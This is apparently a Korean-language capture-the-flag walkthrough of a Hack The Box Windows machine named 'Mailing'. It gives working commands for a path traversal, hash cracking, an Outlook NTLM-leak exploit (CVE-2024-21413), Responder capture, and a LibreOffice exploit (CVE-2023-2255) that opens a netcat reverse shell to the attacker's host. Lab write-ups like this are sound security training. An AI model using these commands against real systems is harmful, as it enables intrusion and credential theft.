Proof of Concept
10.129.232.39
Nmap
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
5985/tcp open wsmanInitial Access
Nmap 스크립트 실행 결과 hMailServer 사용중인 것을 확인
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY80 포트 웹 서비스 접속 시 http://mailing.htb로 리다이렉트 됨
┌──(kali㉿kali)-[~/Mailing]
└─$ curl http://10.129.232.39
<head><title>Documento movido</title></head>
<body><h1>Objeto movido</h1>Este documento puede encontrarse aquí <a HREF="http://mailing.htb"></a></body>http://mailing.htb 접속 후 “Download Instructions” 버튼 클릭 시 pdf 파일이 다운되는 것을 확인
file 파라미터 수정하여 Path Traversal 취약점이 발생하는 것을 확인
┌──(kali㉿kali)-[~/Mailing]
└─$ curl http://mailing.htb/download.php?file=../../../../../../../Windows/System32/drivers/etc/hosts
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
<SNIP>
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 mailing.htbPath Traversal 취약점을 이용하여 hMailServer 설정 파일 확인
- 비밀번호 해시값 2개 발견
- 841bb5acfa6779ae432fd7a4e6600ba7
- 0a9f8ad8bf896b501dde74f08efd7e4c
┌──(kali㉿kali)-[~/Mailing]
└─$ curl 'http://mailing.htb/download.php?file=../../../../../../../Program%20Files%20%28x86%29/hMailServer/Bin/hMailServer.ini'
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1해시 크랙하여 평문 비밀번호 획득
- homenetworkingadministrator
┌──(kali㉿kali)-[~/Mailing]
└─$ hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --quiet
841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
administrator@mailing.htb:homenetworkingadministrator로 IMAP에 로그인 성공하였으나, 메일함에서 발견된 메일 없음
┌──(kali㉿kali)-[~/Mailing]
└─$ telnet 10.129.232.39 143
Trying 10.129.232.39...
Connected to 10.129.232.39.
Escape character is '^]'.
* OK IMAPrev1
1 LOGIN administrator@mailing.htb homenetworkingadministrator
1 OK LOGIN completed
1 LIST "" *
* LIST (\HasNoChildren) "." "INBOX"
1 OK LIST completed
1 SELECT INBOX
* 0 EXISTS
* 0 RECENT
* FLAGS (\Deleted \Seen \Draft \Answered \Flagged)
* OK [UIDVALIDITY 1709316818] current uidvalidity
* OK [UIDNEXT 1] next uid
* OK [PERMANENTFLAGS (\Deleted \Seen \Draft \Answered \Flagged)] limited
1 OK [READ-WRITE] SELECT completed악성 링크를 만들어 로컬 NTLM 자격 증명 정보 탈취 가능한 취약점 발견 (CVE-2024-21413)
POC 다운로드
┌──(kali㉿kali)-[~/Mailing]
└─$ git clone https://github.com/CMNatic/CVE-2024-21413.git
Cloning into 'CVE-2024-21413'...
remote: Enumerating objects: 73, done.
remote: Counting objects: 100% (73/73), done.
remote: Compressing objects: 100% (61/61), done.
remote: Total 73 (delta 38), reused 32 (delta 10), pack-reused 0 (from 0)
Receiving objects: 100% (73/73), 246.52 KiB | 3.38 MiB/s, done.
Resolving deltas: 100% (38/38), done.POC exploit.py 파일에서 발신자,수신자,서버 주소 수정. 이때 수신자는 http://mailing.htb 홈페이지에 기재되어 있는 사용자 “maya”로 테스트
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender_email = 'administrator@mailing.htb' # Replace with your sender email address
receiver_email = 'maya@mailing.htb' # Replace with the recipient email address
password = input("Enter your attacker email password: ")
<SNIP>
msgHtml = MIMEText(html_content,'html')
message.attach(msgHtml)
server = smtplib.SMTP('10.129.232.39', 25)
server.ehlo()POC 실행
┌──(kali㉿kali)-[~/Mailing/CVE-2024-21413]
└─$ python exploit.py
Enter your attacker email password: homenetworkingadministrator
Email deliveredresponder 실행 후 기다리면 maya 사용자의 NLTM 해시 획득 가능
┌──(kali㉿kali)-[~/Mailing/CVE-2024-21413]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
<SNIP>
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.232.39
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:0f70efd28447e8d7:28F4E61E3AD20F01BBF0CA197FFCE5A2:01010000000000000003A4606195DC013D0A1BC1AF68136A0000000002000800590032004C00390001001E00570049004E002D00510034004E0051005100360045004200310049004E0004003400570049004E002D00510034004E0051005100360045004200310049004E002E00590032004C0039002E004C004F00430041004C0003001400590032004C0039002E004C004F00430041004C0005001400590032004C0039002E004C004F00430041004C00070008000003A4606195DC0106000400020000000800300030000000000000000000000000200000169646BF7B86303B6BB0DBD125563B7B38E64980EC7AB557B37949A9C92CB2460A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310037000000000000000000
[*] Skipping previously captured hash for MAILING\maya
[*] Skipping previously captured hash for MAILING\mayaHTLMv2-SSP 해시 크랙하여 평문 비밀번호 획득
- maya:m4y4ngs4ri
┌──(kali㉿kali)-[~/Mailing]
└─$ hashcat hash.txt /usr/share/wordlists/rockyou.txt --quiet
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
MAYA::MAILING:0f70efd28447e8d7:28f4e61e3ad20f01bbf0ca197ffce5a2:01010000000000000003a4606195dc013d0a1bc1af68136a0000000002000800590032004c00390001001e00570049004e002d00510034004e0051005100360045004200310049004e0004003400570049004e002d00510034004e0051005100360045004200310049004e002e00590032004c0039002e004c004f00430041004c0003001400590032004c0039002e004c004f00430041004c0005001400590032004c0039002e004c004f00430041004c00070008000003a4606195dc0106000400020000000800300030000000000000000000000000200000169646bf7b86303b6bb0dbd125563b7b38e64980ec7ab557b37949a9c92cb2460a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310037000000000000000000:m4y4ngs4ri알아낸 maya 계정 정보로 WinRM 접속 성공
┌──(kali㉿kali)-[~/Mailing]
└─$ evil-winrm -i 10.129.232.39 -u 'maya' -p 'm4y4ngs4ri'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\DocumentsRead user.txt
*Evil-WinRM* PS C:\Users\maya\Desktop> type user.txt
bcb1cec3b74e6092c98da2a679cb77ec
*Evil-WinRM* PS C:\Users\maya\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::384d:3ea1:4d96:f98a
Temporary IPv6 Address. . . . . . : dead:beef::9927:4950:6f2e:6588
Link-local IPv6 Address . . . . . : fe80::5969:93e6:fc58:aa7f%14
IPv4 Address. . . . . . . . . . . : 10.129.232.39
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%14
10.129.0.1Privilege Escalation
maya 사용자로 SMB 인증 성공
┌──(kali㉿kali)-[~/Mailing]
└─$ nxc smb 10.129.232.39 -u 'maya' -p 'm4y4ngs4ri'
SMB 10.129.232.39 445 MAILING [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.232.39 445 MAILING [+] MAILING\maya:m4y4ngs4ri“Important Documents” SMB 공유 폴더에 읽기/쓰기 권한을 보유한 것을 확인
┌──(kali㉿kali)-[~/Mailing]
└─$ r
nxc smb 10.129.232.39 -u 'maya' -p 'm4y4ngs4ri' --shares
SMB 10.129.232.39 445 MAILING [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.129.232.39 445 MAILING [+] MAILING\maya:m4y4ngs4ri
SMB 10.129.232.39 445 MAILING [*] Enumerated shares
SMB 10.129.232.39 445 MAILING Share Permissions Remark
SMB 10.129.232.39 445 MAILING ----- ----------- ------
SMB 10.129.232.39 445 MAILING ADMIN$ Admin remota
SMB 10.129.232.39 445 MAILING C$ Recurso predeterminado
SMB 10.129.232.39 445 MAILING Important Documents READ,WRITE
SMB 10.129.232.39 445 MAILING IPC$ READ IPC remota해당 SMB 공유 폴더는 타겟 머신의 “C:\Important Documents”에 위치
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/22/2025 4:36 PM cleanup
d----- 2/4/2026 4:19 PM Important Documents
d----- 2/28/2024 8:49 PM inetpub
d----- 12/7/2019 10:14 AM PerfLogs
d----- 3/9/2024 1:47 PM PHP
d-r--- 3/13/2024 4:49 PM Program Files
d-r--- 3/14/2024 3:24 PM Program Files (x86)
d-r--- 3/3/2024 4:19 PM Users
d----- 4/29/2024 6:58 PM Windows
d----- 4/12/2024 5:54 AM wwwrooWinPEAS로 사용하여 타겟 머신에 LibreOffice가 설치되어 있는 것을 확인
Check if you can modify installed software https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications
C:\Program Files\Archivos comunes
C:\Program Files\Common Files
C:\Program Files\desktop.ini
C:\Program Files\dotnet
C:\Program Files\Git
C:\Program Files\Internet Explorer
C:\Program Files\LibreOffice
C:\Program Files\Microsoft Update Health Tools
C:\Program Files\ModifiableWindowsApps
C:\Program Files\MSBuild
C:\Program Files\OpenSSL-Win64
C:\Program Files\PackageManagement
C:\Program Files\Reference Assemblies
C:\Program Files\RUXIM
C:\Program Files\Uninstall Information
C:\Program Files\VMware
C:\Program Files\Windows Defender
C:\Program Files\Windows Defender Advanced Threat Protection
C:\Program Files\Windows Mail
C:\Program Files\Windows Media Player
C:\Program Files\Windows Multimedia Platform
C:\Program Files\Windows NT
C:\Program Files\Windows Photo Viewer
C:\Program Files\Windows Portable Devices
C:\Program Files\Windows Security
C:\Program Files\Windows Sidebar
C:\Program Files\WindowsApps
C:\Program Files\WindowsPowerShell
C:\Windows\System32C:\Program Files\LibreOffice\program\version.ini 파일에서 LibreOffice 버전 확인
- 7.4.0.1
*Evil-WinRM* PS C:\Program Files\LibreOffice\program> type version.ini
[Version]
AllLanguages=en-US af am ar as ast be bg bn bn-IN bo br brx bs ca ca-valencia ckb cs cy da de dgo dsb dz el en-GB en-ZA eo es et eu fa fi fr fur fy ga gd gl gu gug he hsb hi hr hu id is it ja ka kab kk km kmr-Latn kn ko kok ks lb lo lt lv mai mk ml mn mni mr my nb ne nl nn nr nso oc om or pa-IN pl pt pt-BR ro ru rw sa-IN sat sd sr-Latn si sid sk sl sq sr ss st sv sw-TZ szl ta te tg th tn tr ts tt ug uk uz ve vec vi xh zh-CN zh-TW zu
buildid=43e5fcfbbadd18fccee5a6f42ddd533e40151bcf
ExtensionUpdateURL=https://updateexte.libreoffice.org/ExtensionUpdateService/check.Update
MsiProductVersion=7.4.0.1
ProductCode={A3C6520A-E485-47EE-98CC-32D6BB0529E4}
ReferenceOOoMajorMinor=4.1
UpdateChannel=
UpdateID=LibreOffice_7_en-US_af_am_ar_as_ast_be_bg_bn_bn-IN_bo_br_brx_bs_ca_ca-valencia_ckb_cs_cy_da_de_dgo_dsb_dz_el_en-GB_en-ZA_eo_es_et_eu_fa_fi_fr_fur_fy_ga_gd_gl_gu_gug_he_hsb_hi_hr_hu_id_is_it_ja_ka_kab_kk_km_kmr-Latn_kn_ko_kok_ks_lb_lo_lt_lv_mai_mk_ml_mn_mni_mr_my_nb_ne_nl_nn_nr_nso_oc_om_or_pa-IN_pl_pt_pt-BR_ro_ru_rw_sa-IN_sat_sd_sr-Latn_si_sid_sk_sl_sq_sr_ss_st_sv_sw-TZ_szl_ta_te_tg_th_tn_tr_ts_tt_ug_uk_uz_ve_vec_vi_xh_zh-CN_zh-TW_zu
UpdateURL=https://update.libreoffice.org/check.php
UpgradeCode={4B17E523-5D91-4E69-BD96-7FD81CFA81BB}
UpdateUserAgent=<PRODUCT> (${buildid}; ${_OS}; ${_ARCH}; <OPTIONAL_OS_HW_DATA>)
Vendor=The Document FoundationLibreOffice 7.4.0.1 버전에서 취약점 발견 (CVE-2023-2255)
POC 다운로드
┌──(kali㉿kali)-[~/Mailing]
└─$ git clone https://github.com/elweth-sec/CVE-2023-2255.git
Cloning into 'CVE-2023-2255'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 10 (delta 2), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (10/10), 8.47 KiB | 4.24 MiB/s, done.
Resolving deltas: 100% (2/2), done.POC 실행하여 칼리 리눅스로 리버스쉘 연결을 시도하는 exploit.odt 파일 생성
┌──(kali㉿kali)-[~/Mailing/CVE-2023-2255]
└─$ python CVE-2023-2255.py --cmd 'cmd.exe /c C:\ProgramData\nc64.exe 10.10.14.17 4444 -e cmd.exe' --output 'exploit.odt'
File exploit.odt has been created !exploit.odt 파일을 “Important Documents” 디렉토리에 업로드
*Evil-WinRM* PS C:\Important Documents> upload exploit.odt
Info: Uploading /home/kali/Mailing/exploit.odt to C:\Important Documents\exploit.odt
Data: 40744 bytes of 40744 bytes copied
Info: Upload successful!“C:\ProgramData”에 nc64.exe 바이너리 파일도 업로드
*Evil-WinRM* PS C:\ProgramData> upload ../Tools/nc64.exe
Info: Uploading /home/kali/Mailing/../Tools/nc64.exe to C:\ProgramData\nc64.exe
Data: 60360 bytes of 60360 bytes copied
Info: Upload successful!nc 리스너 실행시키고 잠시 기다리면 관리자 리버스 쉘이 연결됨
┌──(kali㉿kali)-[~/Mailing]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.129.232.39] 49494
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice\programRead root.txt
C:\Users\localadmin\Desktop>type root.txt
type root.txt
330d70c27ecc825bd9fdedfb84f01627
C:\Users\localadmin\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::10b
IPv6 Address. . . . . . . . . . . : dead:beef::9ea5:735f:c839:473c
Temporary IPv6 Address. . . . . . : dead:beef::e0ca:469b:b883:c918
Link-local IPv6 Address . . . . . : fe80::9e42:78f4:b8f9:c94c%14
IPv4 Address. . . . . . . . . . . : 10.129.232.39
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%14
10.129.0.1